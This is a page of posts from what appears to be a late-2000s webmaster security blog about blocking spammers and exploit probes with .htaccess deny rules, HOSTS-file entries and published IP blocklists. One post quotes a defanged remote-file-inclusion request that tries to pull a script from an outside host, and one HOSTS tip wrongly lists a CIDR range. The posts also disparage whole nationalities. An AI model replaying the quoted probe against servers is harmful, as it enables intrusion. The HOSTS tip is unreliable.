Any website that is running php or cgi scripts is in danger of becoming an inadvertent carrier of the redirection iframe that leads your innocent visitors to servers that are rigged to exploit a variety of exploitable vulnerabilities in their browsers, or browser add-ons, plug-ins, or helper objects. Some of the most frequently exploited applications are Internet Explorer (any version prior to 8.0), Adobe Flash, Adobe Reader and Apple Quicktime. Other exploited programs include Apple Safari, Google Chrome and occasionally, Mozilla Firefox. On rare occasions the Opera browser and the Java plug-in are vulnerable to targeted attacks. Firefox and Opera browsers are usually updated very quickly after a vulnerability is reported to their maintainers. Plug-ins usually take longer to update because they have to interact with so many other items and applications.

Webmasters and server administrators, you are responsible for keeping up to date with patches released by software authors, for any applications or scripts that you choose to run on your websites. Information to help you protect your websites and servers from getting exploited by hostile injection probes is in my extended comments.

Individuals browsing the Internet are the real targets of all of these injection attacks. This includes everybody reading this article. You and I have to constantly remain vigilant about threats to our computers' security. New exploits are found every month and are often released in the wild before software authors can respond with patched versions. Those are called zero day exploits. There are several ways to protect your computers from these exploits, including, but not limited to keeping up to date with all Windows, Mac or Linux updates and patches, and patches for commonly exploited third party browser add-ons, like Flash players, PDF Readers, Quicktime and Java plug-ins. Your next line of defense is a combination of security programs encompassing a 2-way firewall, anti-virus and anti-spyware and web threat protection that blocks hostile web pages. Or, you can install one top-notch security suite, like Trend Micro Internet Security and have all these protections and more in just one regularly updated package. There are links to reputable security products in the right sidebar on all of my blog pages.

Windows users have an additional means of protecting their PCs from visiting hostile websites. There is a special file, normally found in (C):\Windows\System32\Etc\, with the unusual file name: HOSTS . Although it has no file extension it can be opened and edited using the built-in Windows Notepad. The HOSTS file takes input in the form of IP addresses and website URLs, separated by a tab or multiple spaces. To protect your computer from being redirected to the hostile tojandglow website, or the Ukrainian server it tries to redirect you to, open your HOSTS file and edit it using these steps.

1. Using Start > (My) Compute, double-click on the C drive icon, then navigate to your Windows\System32\etc\ folder.


2. Inside the "etc" folder you should see a file named "Hosts" You may have to unhide system files before this file can be seen. See my extended comments for details on how to do this.


3. Right-click on the file named HOSTS and choose (left click) Properties


4. Find the attributes section starting with "READ-ONLY" and uncheck it if it was checked


5. Click Apply and OK to close the Properties window.


6. Right-click on HOSTS while holding down the Shift key and select "Open With"


7. Scroll through the programs list until you find "Notepad" and double-click on it


8. If Notepad isn't listed you will have to use the browse button to navigate to the Windows folder, where Notepad.exe is located.


9. With HOSTS open for editing go to the last line in the file and hit ENTER


10. Add these lines, with a tab after each 127.0.0.1:
    
    
    
    • 127.0.0.1       tojandglow.com
    
    
    • 127.0.0.1       91.212.65.138
    
    
    • 127.0.0.1       91.212.65.0/24
    
    


11. Click File > Save and in the File Type selection, choose All FIles and save it as HOSTS, without an extension.


12. Windows may decide to add a .txt extension anyway. If it does, allow this, then right-click on the saved file and delete the .txt extension. Answer the challenge about changing file extensions.

BTW: If you see any 127.0.0.1 entries referring to microsoft.com in your HOSTS file, remove them! Malware put them there to prevent you from getting Windows Updates or Microsoft security downloads. Ditto for any recognizable security vendors' websites.

Continue reading "Block Ukrainian Malware Server on Eurohost" »

Posted by Wiz at 5:10 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

Many of my regular visitors are aware that I maintain and publish various IP address blocklists, used to protect websites and web servers from nefarious activities by scammers, spammers and exploiters. Today, my website came under attack from a Russian Server, located in Saint Petersburg, Russia. The attacks were server exploit attempts, using various Query strings and http redirects. All were blocked by my security measures, but there were so many attempts in a short period of time that I feel that I should spread the word to other webmasters, before it is too late.

First off, server exploit attempts are nothing new. They happen every day and are easily seen if you read your website's raw access logs or stats. Most exploit attempts are fast in/out probes, usually coming from rotating IP addresses, and only a few at a time. But, the attack I logged this morning was different than the usual model. In a 26 minute period I received 69 exploit probes from the same IP address. I ran a Whois lookup on the IP 77.221.130.5 and found that is it assigned to Server 005 on infobox.ru, in Saint Petersburg, Russia. This is a virtual hosting and colocation data center, who's assigned address range is from 77.221.128.0 - 77.221.143.255, which is designated by the network CIDR: 77.221.128.0/19.

Security-minded webmasters are interested in blocking offending IP addresses and the CIDRs that encompass exploited servers. Most folks running websites are hosted on Apache web servers and are using shared hosting accounts, where they can only use .htaccess file "directives" to block unwanted Internet traffic. Some web hosts may allow only "Mod_Access" directives in user defined .htaccess files. Here is a Mod_Access rule you can add to your .htaccess file to block the offending Russian data center mentioned above:

<Files *>
order deny,allow
deny from 77.221.128.0/19
</Files>

In the above .htaccess directive all IP addresses are permitted access to all files (Files *), except for those IPs included within the CIDR 77.221.128.0/19. This is due to the "order" statement (order deny,allow), where deny is processed before allow. Anything defined in "deny from" rules is processed first. Anything not specifically denied is allowed by default.

I mentioned in the opening paragraph that I publish various IP blocklists (a.k.a. Blacklists). The list that blocks the source of this exploit is called the Russian Blocklist, which includes numerous IP address ranges in Russia, The Ukraine, Turkey and several other former Soviet Union countries. These lists are available in two formats each. The most commonly used format is my .htaccess blocklists and the lesser used type is my iptables blocklists.

Currently, there are four separate blocklists per format. They are the "Chinese" (and Indo-China), "Exploited Servers" (+ proxies), "Nigerian" (and African) and "Russian" (+ Turkey and former Soviet Union) Blocklists. If you use a shared web hosting account you will only be able to use the .htacccess format. If you have a VPS or fully dedicated server you can probably use the iptables blocklists, which require "root" access to the OS. The iptables blocklists deny all access to a server and all of its modules, including email and ftp servers. A .htaccess blocklist can only deny access to http and https traffic. Either type will block the exploit probes listed in my extended comments. The landing pages explain how to use the directives contained in each blocklist.

All of my blocklists are currently free for the taking, but I do appreciate donations if you benefit from my work. You will find PayPal Donate buttons on each blocklist page.

Continue reading "Russian Server sending exploit codes. Block 77.221.128.0/19 now!" »

Posted by Wiz at 12:15 AM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

Server exploits abound!

Enough is enough already! It's bad enough that I have to fend off the occasional exploit attempt against my main website, but 24 in one day, from the same IP address is something I can't ignore, and neither should anybody else who maintains a website. That IP address is 212.241.182.240, which is a dedicated server that belongs to Pipex Dedicated Hosting (and associates), in Great Britain (See Whois report). This is an exploited server and it is hostile to other servers and websites!

Here is a sample of just one of the many attacks launched by this server, against mine (I deactivated the hyperlink to the hostile script, substituting an * for a t):

212.241.182.240 - - [01/Feb/2009:02:44:23 -0800] "GET /?sIncPath=ht*p://kadin.or.id/mail/id1.txt?? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

What's this all about, you ask? It's about somebody who is leasing a dedicated server and either knowingly or unknowingly using it to blast out hostile exploitation scripts against other servers. This exploit is trying to upload a file named id1.txt into my website, via some vulnerability in a script that might be running on it (didn't happen - see the 403 response). Normally I wouldn't even assume that the people leasing the server had any knowledge of such goings on, but this time something is different. In just about every other instance of script injection attempts, when I trace the IP to a server and try to access it, I usually see one of the following responses:

1. A website's home page (index.html, index.php, etc.)
2. A "Welcome to Apache" screen, for a new website on an Apache server
3. A Welcome to cPanel or WHM screen
4. A welcome screen for an unconfigured website hosted on a Windows IIS server
5. A 403 Forbidden message (someone doesn't want me poking around)
6. A message that no website has yet been configured on the server

Today, when I went to investigate the IP address that was spewing out 24 exploit attempts in one day, instead of one of the above listed typical responses, all I saw was a login field, requesting a user name and password. This is a password protected website and it is being used to exploit other websites and web servers. Nobody can access any of it's pages, or inject hostile scripts into it without logging in with the correct credentials. Maybe this server used a weak password and user name combination that was cracked with a dictionary or rainbow attack, or maybe the administrator was tricked into allowing a keylogger to infect his or her personal computer (used to login to his/her website), or maybe the owner is knowingly using this server to launch exploit attacks against other servers, like mine.

Whatever the case may be, this server is out to get us and if you run a website you may want to block it for your website's protection. I will give you several methods of denying access to this server and others launching similar exploits, in my extended comments.

Continue reading "Block server script injection exploits targeting your websites" »

Posted by Wiz at 1:23 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

After having my websites hosted by Bluehost for two years I have had to make a business decision and change web hosting companies. Note, this decision was based solely on price, not any problems with the service. My web hosting renewal date is fast approaching and as it turns out the cost of renewing my annual hosting contract had gone up, rather than down. Despite contacting the sales department at Bluehost they were unwilling to negotiate with me, so I looked around for a while and decided to switch my websites to LunarPages, on their Basic hosting package. Instead of having to pay out almost $108 for another year at Bluehost, I am paying just under $60 to LunarPages; almost half the annual price! Normally, this hosting would cost $6.95 a month (still $2.00/month cheaper than Bluehost's 1 year renewal rate), but I got this deal because LunarPages is running a Fall Special rate of only $4.95 per month, annually, for new accounts. In these tough economic times I had to get the best price, along with excellent service, and that's what LunarPages offers.

Let's get to the specifics and compare LunarPages hosting to Bluehost. Both now offer unlimited disk space and data transfer (a.k.a "Bandwidth"). If I would have had to rewrite my entire website to accommodate the new host I wouldn't have made the change, even to save the $48.00. But, I didn't have to change a single script, or file location. Everything works on LunarPages exactly the same as it did on Bluehost! There is a slight difference between the cPanel features on LunarPages, but nothing monumental and nothing I require for normal operation. In fact, get this, after recreating just the POP3 email accounts, Using the "Backup" icon on both cPanels, I was able to export my email forwarding accounts and spam filters from Bluehost to G-zipped files on my computer, then import those same files into my new account on LunarPages, and voila, my 50+ email forwarding (alias) accounts and custom mail filters were loaded and ready to go! Uploading all of my website files and folders took a bit of time (at about 40 KB/sec. max.), but went smoothly and flawlessly. In all there was just under a gigabyte uploaded to the new server. Then, I recreated the database and super-user for my MovableType blog, exported the database from Bluehost, imported it into LunarPages (using the Backup page icon), and Bam, there was my blog! Then I went back into cPanel and inputted my "add-on" domains and they became separate websites. My parked domains similarly became parked on my main site at LunarPages, just like they were on BlueHost.

I am an activist Webmaster and spam fighter and I don't tolerate log or blog spammers at all. I have developed some really advanced spam and exploit detection and blocking rules that I apply in my .htaccess files and all of those rules work exactly the same on LunarPages as they did on BlueHost. These rules include certain ip based blocklists that I publish for others to use to protect their websites from spammers, scammers and exploiters in various unfriendly countries. Each blocklist is available in both .htaccess and iptables formats. If you have an Apache server based website and are being troubled by Exploited Servers, Nigerian scammers, Russian spammers, or Chinese hackers, take a look at my .htaccess, or iptables blocklists.

I use a CGI hit counter and run the counter script in a special directory, not the cgi-bin. Both BlueHost and LunarPages allow CGI scripts to run in any directory you want, after you CHMOD the Perl scripts to "755." Oh yeah, "XBitHack Full" in .htaccess works on LunarPages, if you set the X bit to executable (744).

LunarPages supplies a means of accessing your website before it goes live, so I was able to test all functions to make sure I hadn't forgotten anything. Of course I did forget to CHMOD a few miscellaneous executable files, which took a couple of minutes to locate and correct. After everything tested correctly I logged into Dotster, my Domain Registrar, where I changed the primary and secondary Name Servers from BlueHost to LunarPages. I changed the last modified date in the JavaScript include file used in the footer of every page then uploaded that just to LunarPages, leaving the last modified date as it was on BlueHost. Within a half hour my website was loading from LunarPages, showing the new last modified date! It took two days for the DNS change to traverse throughout the Internet, after which the entire World was seeing my new web host location. I left the files up on BlueHost for the couple of last stragglers that were still being routed there. They can serve as an emergency backup mirror, in case LunarPages was to suffer an outage before my BlueHost account expires next month.

I wrote a web page describing the LunarPages hosting packages and features of the Basic hosting account and invite you to read it. Right now they are still running the Fall Special price of only $4.95 per month, for one or two year contracts. If you need a new hosting company and want to save money, but still get real telephone support, please give them a try. They have a 30 day full money back guarantee if you aren't satisfied. I had one chance to call support with a question about the server I was on. The phone was answered by an automated routing machine. I pressed the key to route to technical support and somebody in the USA picked up the phone after two rings. Just call 1-877-LUNARPAGES if you need phone support for USA and Canada. For the United Kingdom, call 0800-072-9150 instead. If you live outside of these countries, you cannot dial the toll free number. They provide another support line for their international customers: 1-714-521-8150.

Posted by Wiz at 10:40 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

Today I reviewed my daily access log for this website, and I discovered a large number of repeated attempts to spam my access log, all coming from the IP address: 64.182.124.212. The spam attempt was referrer field entries for a medial search engine and a social networking and dating website.

The IP address 64.182.124.212 belongs to a web hosting company known as CI Host, and is assigned to hosting customer PacificAir.com, an amateur looking website. The spamvertised websites in the referrer field look just as amateur as the PacificAir website and are hosted on the same server. The IP range assigned to CI Host is 64.182.0.0 through 64.182.255.255, or in CIDR notation: 64.182.0.0/16.

The way I respond to attempts to spam my access logs is that I place the offending IP address, and/or CIDR of their hosting company, on my published IP blocklists. I did just that, placing the CIDR 64.182.0.0/16 on my Exploited Servers Blocklist. If you are getting spammed from the IP address 64.182.124.212 and want to block them in your .htaccess file, on your Apache Hhosted website, just add one of the following rules to a section labeled <Files *>:

<Files *>
order deny,allow
deny from 64.182.124.212
</Files>

If, like me, you decide to block the entire ISP/web hosting company, use this rule:

<Files *>
order deny,allow
deny from 64.182.0.0/16
</Files>

NOTE:
If you have your website hosted by CI Host please read the warning in my extended comments!

Continue reading ".htaccess blocklist addition for prolific access log spammer" »

Posted by Wiz at 3:10 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

"Stupid Russian Blog Spammers Still Wasting Their Time" makes for a catchy, surreal title, but it's true. The same country that produced the brilliant criminal masterminds behind the Storm and Grisbi Worms has also produced some of the stupidest blog spammers to ever set finger to keyboard!

Let me explain what I am referring to regarding stupid blog spammers. First of all, look up in the upper right corner of this blog, just under the Google search field. Here's what it says in capital letters: "SORRY: NO COMMENTS, NO TRACKBACKS!" That should be self explanatory to almost anybody who can read English words, including people intent on spamming a blog such as this one, using English words. You know the crap I'm talking about; links to buy unlicensed or illegal drugs or herbal solutions, to cure "ED" or enlarge one's "natural size." When I first started this blog I did allow trackbacks and comments and that is what I was getting submitted, all in English and all traced to Russian and Ukrainian IP addresses.

As soon as I realized that only blog spammers were trying to comment on my blog I decided to disable the codes and modules that allowed comments and trackbacks. Still, these idiots in Russia and the Ukraine continued trying to POST comments and trackbacks to the now disabled modules that used to handle those functions. This led me to write three articles about these incidents, during the spring and summer of 2007. Their names and links to them are as follows:

1. Stupid Blog Trackback Spammers Don't Understand Server 403 Responses


2. Russian and Ukrainian Blog Spammers are STUPID!


3. Blog spammers still wasting their time tying to spam this unspammable blog

Anyway, insults to the enemy aside (it feels good though!), I never see the comments they are typing, just an access log entry containing a 403 Forbidden, or 302 redirect back to their own websites (lol). My Apache-based, shared-hosting web server is protected with a custom ".htaccess" file that contains my entire, now-famous, "Russian Blocklist!" Many webmasters are using this blocklist to keep Russian and Turkish spammers and hackers from accessing their web sites.

If your web site and blog is hosted on a shared Apache/Linux based web server and you want to block access to IP addresses in the former Soviet Union and Turkey, just download my Russian .Htaccess Blocklist and either use it as your new .htaccess file, or merge the "deny from" list into your existing .htaccess. Full instructions are included on my .htaccess blocklists landing page and on each blocklist page. The landing page has links to all of my existing .htaccess IP blocklists (Chinese, Nigerian, Russian and Exploited Servers), as well as my iptables Linux firewall blocklist equivalents.

An actual access log entry and codes you can use to block web site access to these people, are in my extended content.

Continue reading "Stupid Russian Blog Spammers Still Wasting Their Time" »

Posted by Wiz at 6:28 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

Steel Guitar Forum goes offline.

On May 19, 2008, the external RAID hard disk drive unit powering the popular website - The Steel Guitar Forum (SGF) - suffered a catastrophic failure, taking the entire website offline. It remains offline as of May 22, 2008, while a new RAID setup is being installed and data recovery attempted. We are hoping to have the server back online as soon as possible, with as little data loss as possible. As many of you already know I do security for the SGF and act as moderator of the "Computers" section of the forum. I have assisted the owner/Administrator, Bobby Lee Quasar, in procuring a suitable replacement.

The Steel Guitar Forum is a (paid) members only community consisting of over 4000 professional and amateur pedal and non-pedal steel guitarists, located around the World. Most of the World's top steel players are members of this community, where information, techniques and music business discussions take place on a daily basis, as well as the exchange of equipment. For many of these members this website is their primary destination on the Internet and I know that they are missing it's presence during this outage. We are doing everything we can to get the SGF back online. In the meantime I recommend that all affected steel guitarists spend some extra time practicing their instruments!

The SGF is back online, as of the afternoon of May 23.
As it turned out both Western Digital hard disks in the WD MyBook Pro Edition II, external RAID enclosure failed at the same time!

Posted by Wiz at 3:29 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

I read the access logs for my website every day and sometimes I see something that jumps out and grabs my attention, as not right. This month, that something is a bunch of attempts to grab various pages on my blog, in an unusual manner, with a very unusual user agent: WordPress/2.1.1

At first I thought that somebody is just trying to pick up my MovableType RSS feed, but that is not what they are after. So, I did a little research on "WordPress/2.1.1" and learned that it represents a hacker compromised version of the popular WordPress PHP blogging software, which was updated months ago, to version 2.1.2, by Wordpress.org. I suppose that there may be some Wordpress users who haven't heard that this version was hacked with a backdoor, and haven't bothered to check for updates, but the log entries I am seeing are not from a Wordpress blog. I decided to do a little investigating, which is something I am good at. So, I followed the IP addresses to see from whence they came.

What I have learned so far, regarding the visitors who have configured their browser with the user agent "WordPress/2.1.1" is that, (A) - they come at me with no "Referer" field entry, (B) - they always try to GET a blog article itself, followed immediately with a request for the HEAD, and (C) - they change IP addresses after getting my 403 (Forbidden) message and try again. This cloaking of IP addresses has no effect, since I am also blocking them by their User Agent string.

Let's take a look at the access log entries for this user agent (stretch out or maximize your browser):

67.228.198.50 - - [02/Mar/2008:00:58:01 -0700] "GET /blogs/2008/02/my_spam_analysis_for_february_18_24_2008.html HTTP/1.1" 403 350 "-" "WordPress/2.1.1"
67.228.198.50 - - [02/Mar/2008:01:04:52 -0700] "HEAD /blogs/2008/02/my_spam_analysis_for_february_11_17_2008.html HTTP/1.1" 403 238 "-" "WordPress/2.1.1"

69.50.177.18 - - [13/Mar/2008:12:06:49 -0600] "GET /blogs/2008/03/2wire_modem_dns_poisoning_attack_returns_to.html HTTP/1.1" 403 351 "-" "WordPress/2.1.1"
69.50.177.18 - - [13/Mar/2008:12:07:14 -0600] "HEAD /blogs/2008/03/2wire_modem_dns_poisoning_attack_returns_to.html HTTP/1.1" 403 238 "-" "WordPress/2.1.1"

83.222.14.129 - - [23/Mar/2008:16:52:57 -0600] "GET /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"
83.222.14.129 - - [23/Mar/2008:16:52:57 -0600] "HEAD /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"

89.108.85.75 - - [23/Mar/2008:16:52:38 -0600] "GET /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"
89.108.85.75 - - [23/Mar/2008:16:53:08 -0600] "HEAD /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"

91.192.116.2 - - [23/Mar/2008:18:56:59 -0600] "GET /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"
91.192.116.2 - - [23/Mar/2008:18:57:14 -0600] "HEAD /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"

216.255.185.178 - - [24/Mar/2008:10:15:07 -0600] "GET /blogs/2008/03/followup_article_about_windows_vista_sp1_rel.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1
216.255.185.178 - - [24/Mar/2008:10:15:22 -0600] "HEAD /blogs/2008/03/followup_article_about_windows_vista_sp1_rel.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1

These are definitely not typical access log entries and nothing a normal search engine or human visitor would do. Wordpress is a software blog application that gets installed onto web servers. It is not a browser. User agents are words that identify a browser, or a search engine, or robot. Despite the diversity of IP addresses, these visits are not unrelated. Read my extended comments to see where these IP addresses are allocated and my conclusions about their source and probable intent.

Continue reading "Russian connection to user agent "WordPress/2.1.1" in website access logs" »

Posted by Wiz at 8:18 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

Prelude:
For the last couple of years I have been compiling and publishing lists of IP addresses belonging to ISP's and commercially hosted web servers in various parts of the World, from which unwanted spam, scams and server hacking attempts emanate. These lists are compiled in a format that is recognized by Apache Web Servers, using - <Files *> deny from - IP address directives (rules). They include both individual IP addresses and ranges of IP's, belonging to web hosts, server farms and ISP's, known as a CIDR. When a group of these blocked IP addresses and CIDR's are compiled into groups they become a "blocklist," sometimes mislabeled as "blacklist."

My blocklists can be used in at least two different Apache Server configuration files; "httpd.conf" (requires server root access like on dedicated servers) and ".htaccess" (used on shared hosting accounts). My blocklists are all used in private .htaccess files that go into the web root (e.g public_html), or individual folders, on an Apache hosted web site. If your web host allows .htaccess overrides on individual websites you can use any of my blocklists. Instructions are found on each page, in comments like this:

# Here is a sample comment as used in a .htaccess file.
# The # sign causes Apache to ignore the rest of this line

The New Files:
The new Russian Blocklist is now located at www.wizcrafts.net/russian-blocklist.html and it contains IP addresses and CIDR's traced to Russia, The Ukraine, Bulgaria, Romania, Estonia, Latvia, Estonia and Turkey. I included Turkey in this blocklist because I get tons of spam coming through various ISP's in that country (e.g. Turk Telecom), plus numerous server redirection exploit attempts. Basically, the Russian Blocklist is comprised of ISP's, with some web hosting companies thrown if, which are located in Russia or these other Eastern Bloc countries. Most of the traffic I see from these folks are blog, access log and email spam, with the occasional server exploit attempt against my website. New IP addresses and CIDR's are added to this blocklist as I analyze spam sources, or trace log/blog spam attempts (all unsuccessful due to my security measures and filters) to countries covered by this file.

The new Exploited Servers Blocklist is located at www.wizcrafts.net/exploited-servers-blocklist.html and contains long "deny from" lists of various types of web hosting and dedicated server companies, that are, have, or might try to run hostile codes against my web site, or spam my access logs, or bypass my security measures, or try to steal my traffic via proxy services. All of these things are hostile actions and are conducted by criminals and criminal organizations. This blocklist is growing rapidly as I see and trace exploits attempts against my server.

Conclusion:
If you have been using my previous file - russia+exploited-server-blocklist.html - please change your bookmarks to point to one, or both of the new files that have replaced it. Here is a list of my current .htaccess blocklists, as of this posting:

Exploited Servers Blocklist | Russian Blocklist | Nigerian Blocklist | Chinese-Korean Blocklist

Posted by Wiz at 4:56 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

Sometimes people who you'd think know what they're doing are just so completely clueless that it makes me laugh! I am referring to Blog spammers; the guys in Russia, The Ukraine, Estonia and other parts of the former Soviet Union, who relentlessly pound away at their keyboards, sending comment and trackback spam messages to every MovableType blog they can locate. They must assume that most of these blogs accept these comments and blindly publish them, because they keep trying to post spam messages to MT blogs, linking back to their spamvertised websites hawking various drugs, or pornography.

Well, I for one don't allow any comments or trackbacks on my blog. It says so in plain, bold English and Russian words, at the top-right of every blog page, and in all of my blog search results pages. Look under the Google Search box, at the top right of this page, and you'll plainly see where it says:

SORRY: NO COMMENTS, NO TRACKBACKS
КОММЕНТАРИИ и TRACKBACKS ВЫКЛЮЧЕНЫ и НЕ ИЗДАНЫ!

Now, if I was wanting to spam this blog and I read that, I'd move along to an easier target and not waste my time on this one. Yet, when I read my server access logs I see that somebody keeps trying to post comments and trackbacks to specific articles in my archives (all of which get a server 403 response), then tries to search for them on the pages to which they were targeted. However, since I don't want any comments or trackbacks I have deleted the Perl files that handle them and disabled those functions in my global settings. Heck, I have even stripped out all the codes referring to trackbacks from my page templates. Even I can't post a trackback on this blog!

Since these spam comments never reach my blog, when the idiots who try to post them search for them on the target pages, nothing is found matching those spam terms. Boris the Spammer needs to get a life or find less secure targets to pester. Instead, he plugs away fruitlessly on this blog, filling my access logs with all kinds of new IP addresses for me to add to my ever-growing Russian Blocklist.

Countless webmasters are using my Russia+Exploited Servers Blocklist. Most of the IP addresses in the Russian blocklist are gathered from my own raw access logs, from stupid blog spammers who evidently can't read the English or Russian notice that I don't allow comments or trackbacks.

If you have a blog or forum that is getting scammed by Nigerians, or spammed by Russians, one or more of my .htaccess blocklists may help you get rid of these leeches. Note that they only work on Apache web servers, unless your Windows server has an isapi rewrite module installed by the company leasing the server space to you. You can use my Webmaster Contact page to hire me as a consultant to help keep scammers and spammers off your website.

Posted by Wiz at 11:34 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

The title of this article tells it all: "Stupid Blog Spammers Don't Understand Server 403 Responses!" Many months ago I discovered that although comments and trackbacks were not being posted to my blog, due to automatic moderation and classification of them as spam, nonetheless they kept on a-comin'. The comments spammers gave up a couple of months ago when they searched my blog only to learn that their bullshit comments had not been posted and never would be (I told them so on the search results page). However, the idiots who are trying to post trackback spam messages don't bother to search the blogs they are posting to, nor do they apparently read the responses sent by the script they are aimed at. If they did all they would see from my blog is a steady stream of server 403 responses; "Access Denied!" I don't even have the comments or trackbacks Perl modules installed anymore, so even I can't post comments or trackbacks to my own blog! I removed them when it became obvious that only spammers were commenting or tracking back.

If you run a MovableType blog and don't care to allow comments or trackbacks, yet you are seeing numerous attempts to spam your blog (in the list of junk comments and trackbacks), you can do what I did and disable them altogether, then delete or rename the files used to post these comments. To disable them in MovableType, log into your MT installation, then click on the left sidebar item "Settings" then click on the "New Entry Defaults" tab, then under "Default settings for new entries" uncheck both "Accept Comments" and "Accept Trackbacks," then scroll down to the bottom of the page and click on the "Save Changes" button. This will remove the Comments and Trackbacks links under all of your posts. You may still have to manually remove existing comments and trackbacks from old topics, or delete the old topics entirely if they have a lot of useless commenting in them.

Despite the fact that you have disabled accepting comments the spammers may still try to go straight to your Perl scripts that handle comments and trackbacks, bypassing the choices you made to exclude them. To prevent this you can either remove or rename these two files that are in the standard MT installation, under the CGI folder/MT (typically cgi-bin/MT/):
mt-comments.cgi
mt-tb.cgi

Without those files nobody is going to Post a spam comment to your blog and you can never accidentally re-enable comments or trackbacks unless you upgrade, or replace those files.

As I said in the beginning these spammers are not reading the results of their attempted trackback messages (success or failure), thus they are probably using automated scripts to send them out blindly from a spam list supplied to them by somebody even dumber than they are, without any concern about success or failure of their efforts. If you run your blog on an Apache hosted web server and want to deny access to these assholes read the technical details in my extended comments.

Continue reading "Stupid Blog Trackback Spammers Don't Understand Server 403 Responses" »

Posted by Wiz at 5:44 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

There are millions of websites that host blogs and/or forums and many of them are targeted by scammers, spammers and hackers. Webmasters everywhere are searching for solutions to these problem-causing individuals and scripts. Some of you already know that I can help you block this unwanted traffic from your websites, but a great many more may just be discovering this fact. If your website, or blog, or forum is hosted on an Apache web server, and your hosting allows personal .htaccess overrides, read on.

For those who don't know what .htaccess is, it is an access control file used on Apache servers, on a per-website basis, to define who may or may not access all or parts of a website, and to rewrite requests for certain files, or folders, or URLs to other files, folders, or URLs. You will notice that the file name has no prefix ; just a period followed by htaccess. This makes it a normally hidden-system file on the Apache hosted web server. Hidden Apache files can be revealed by using a special FTP command: -al or a website control panel function on the file manager page, to display these hidden files for downloading or editing (show hidden files, etc). Your website may or may not already have a .htaccess file. If you upload with an FTP tool use the "remote file mask" -AL ( or -al) and refresh the remote view to see if .htaccess exists in your home, or public_html or / directory (more info in the extended comments). Otherwise, look at your website's file manager, or ftp tools in your Cpanel, or other website control panel. There should be some option to reveal hidden files beginning with a period.

If you do not use an FTP Client to upload files, but are using a web-based control panel, it is entirely up to your web host as to whether or not you can view, alter, or upload .htaccess files.

Important Notice! Be careful when creating, editing, or pasting codes into a .htaccess file, because if you type an invalid term, directive, or character, or add an unescaped space in a regular expression, you may cause a Server 500 error to occur, locking everybody out of the website, except via FTP access (with login credentials).

The blocklists that I am about to tell you about use the Apache Module mod_access which is almost always available in Linux based shared, vps, semi-dedicated, or dedicated hosting. Unfortunately, if your website is hosted on a Windows Server you are out of luck, unless your host has installed, or is willing to install the ISAPI_Rewrite module for you.

Assuming that your website is hosted on a Linux box running an Apache web server, and you are allowed to use a personal .htaccess file with mod_access - IP "deny from" directives, the following web pages may be of great help to you in blocking access from unwanted countries, ISPs or hostile servers that are trying to spam or exploit your server (or website).

First on the list is my first work in the field of blocking scammers from forums and auction sites; my Nigerian Blocklist. I have been and still am compiling this list of IP addresses assigned to Nigeria and most of it's neighboring countries in Africa, from which Nigerian scammers and other African fraudsters have operated against forums and auction sites around the (non-African) World. It is extremely effective at denying access to anybody trying to access your website from within Nigeria or other African countries, including via satellite Internet services. If you have a blog, auction site, or forum that is plagued by Nigerian scammers - try embedding my .htaccess directives into your .htaccess file, or create one by copying and pasting the contents of the one on my Nigerian Blocklist web page into a new plain text file (Notepad) and save it as .htaccess. If your computer's operating system won't allow you to save it without a file prefix, choose htaccess.txt then upload it to your server and rename it there to .htaccess . You will see an instant drop in the number of Nigerian scammers on your website.

The second blocklist deals with unwanted traffic coming from ISPs and servers within China, Korea and surrounding countries. This is my Chinese Blocklist. All of the same methods listed above apply to this mod_access deny from list. It can be copied and pasted into your .htaccess file just like the Nigerian list details show, or it can be added to that list by merging the two groups inside just one set of <Files *> directives. Note that if you do business with anybody in China, Korea or neighboring countries, they will not be able to access your website unless you "poke a hole" in the list to allow their IP address(s) in.

